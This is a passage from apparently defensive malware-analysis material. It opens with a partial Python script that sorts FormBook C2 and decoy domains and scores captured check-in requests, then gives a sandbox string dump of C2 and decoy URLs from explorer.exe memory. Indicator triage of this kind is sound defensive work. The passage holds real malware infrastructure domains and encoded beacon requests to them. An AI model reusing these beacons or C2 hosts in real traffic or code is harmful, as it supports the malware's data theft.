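CONFIG = {
    "C2 list": ["www.crucka.xyz/jd21/"],
    "decoy": [
        "thepowerofzeus.com", "00050591.xyz", "californiacurrentelectric.com",
        "b2vvuc00.sbs", "susansellsmarin.com", "urbanholidayz.com", "batremake.com",
        "tech-with-thulitha.site", "fostertv.net", "p-afactorysale.shop",
        "arthemis-168bet.site", "fasci.online", "tyumk.xyz",
    ],
}

# DNS queries listed in the Networking section of the report.
OBSERVED_DNS = [
    "www.00050591.xyz", "www.californiacurrentelectric.com", "www.b2vvuc00.sbs",
    "www.susansellsmarin.com", "www.urbanholidayz.com", "www.batremake.com",
    "www.crucka.xyz", "www.tech-with-thulitha.site", "www.fostertv.net",
    "www.p-afactorysale.shop", "www.arthemis-168bet.site",
]

# Constructed sample input: the two GETs captured in the run, plus one benign request.
REQUESTS = [
    b"GET /jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp HTTP/1.1\r\n"
    b"Host: www.00050591.xyz\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00",
    b"GET /jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp HTTP/1.1\r\n"
    b"Host: www.californiacurrentelectric.com\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00",
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.0\r\nConnection: close\r\n\r\n",
]

# Heuristic (mine, not a published signature): short key, long base64-like value, short second pair.
BASE64ISH_QUERY = re.compile(r"[A-Za-z0-9]{2,4}=[A-Za-z0-9+/=]{40,}&[A-Za-z0-9]{2,4}=[A-Za-z0-9+/]{1,8}")


def _host(entry: str) -> str:
    """Normalise 'www.host/path' or 'www.host' to 'host' for comparison."""
    host = entry.split("/", 1)[0].lower()
    return host[4:] if host.startswith("www.") else host


def c2_path(config) -> str:
    return "/" + config["C2 list"][0].split("/", 1)[1]      # "/jd21/"


def classify_dns(config, queries):
    """Split observed hostnames into the real C2, known decoys, and unknowns."""
    c2 = {_host(e) for e in config["C2 list"]}
    decoys = {_host(d) for d in config["decoy"]}
    result = {"c2": [], "decoy": [], "unknown": []}
    for q in queries:
        h = _host(q)
        result["c2" if h in c2 else "decoy" if h in decoys else "unknown"].append(q)
    return result


def parse_request(raw: bytes):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(": ")
        headers[k.lower()] = v
    return method, target, headers, body


def checkin_indicators(raw: bytes, config):
    """The FormBook check-in traits a single request exhibits, as a list of labels."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    traits = []
    if method == "GET" and url.path == c2_path(config):
        traits.append("path matches configured C2 path")
    if "user-agent" not in headers:
        traits.append("no User-Agent header")
    if headers.get("connection", "").lower() == "close":
        traits.append("Connection: close")
    if BASE64ISH_QUERY.fullmatch(url.query):
        traits.append("two-parameter query with base64-like payload")
    if body and body.strip(b"\x00") == b"":
        traits.append("trailing NUL padding")
    if _host(headers.get("host", "")) in {_host(d) for d in config["decoy"]}:
        traits.append("Host is a configured decoy domain")
    return traits


def is_formbook_checkin(raw: bytes, config, min_traits: int = 4) -> bool:
    return len(checkin_indicators(raw, config)) >= min_traits


if __name__ == "__main__":
    print(classify_dns(CONFIG, OBSERVED_DNS))
    for req in REQUESTS:
        print(is_formbook_checkin(req, CONFIG), checkin_indicators(req, CONFIG))
```

The point of the DNS cross-reference is triage: only www.crucka.xyz is worth an outbound block and an IOC entry as C2, while the decoy domains are mostly unrelated legitimate sites that FormBook contacts to bury the real beacon in noise. The request scorer deliberately does not key on the specific query parameter names (4h6, tT), which change between builds; the structural traits are what the IDS alerts above are keyed on as well.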
Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory:
  • http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
  • http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
  • http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
  • http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1713192297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4153445383.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4149679384.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory:
  • http://www.00050591.xyz
  • http://www.00050591.xyz/jd21/
  • http://www.00050591.xyz/jd21/www.californiacurrentelectric.com
  • http://www.00050591.xyzReferer:
  • http://www.arthemis-168bet.site
  • http://www.arthemis-168bet.site/jd21/
  • http://www.arthemis-168bet.site/jd21/www.fasci.online
  • http://www.arthemis-168bet.siteReferer:
  • http://www.b2vvuc00.sbs
  • http://www.b2vvuc00.sbs/jd21/
  • http://www.b2vvuc00.sbs/jd21/www.tyumk.xyz
  • http://www.b2vvuc00.sbsReferer:
  • http://www.batremake.com
  • http://www.batremake.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.batremake.com/jd21/www.crucka.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.batremake.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.com/jd21/www.b2vvuc00.sbs
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyz/jd21/www.tech-with-thulitha.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.online
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.online/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.online/jd21/www.uhug.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.onlineReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.net
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.net/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.net/jd21/www.p-afactorysale.shop
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.netReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.com/jd21/www.zaib.art
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shop
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shop/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shop/jd21/www.arthemis-168bet.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shopReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.com/jd21/www.urbanholidayz.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.site/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.site/jd21/www.fostertv.net
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.siteReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz/jd21/www.susansellsmarin.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyz/jd21/www.maioral-store.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.com/jd21/www.batremake.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaib.art
          Source: explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaib.art/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaib.artReferer:
          Source: explorer.exe, 00000002.00000000.1718215415.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1718215415.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000002.00000002.4144621219.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1709841681.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1710657234.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000003.3479427968.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000002.00000003.3479427968.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
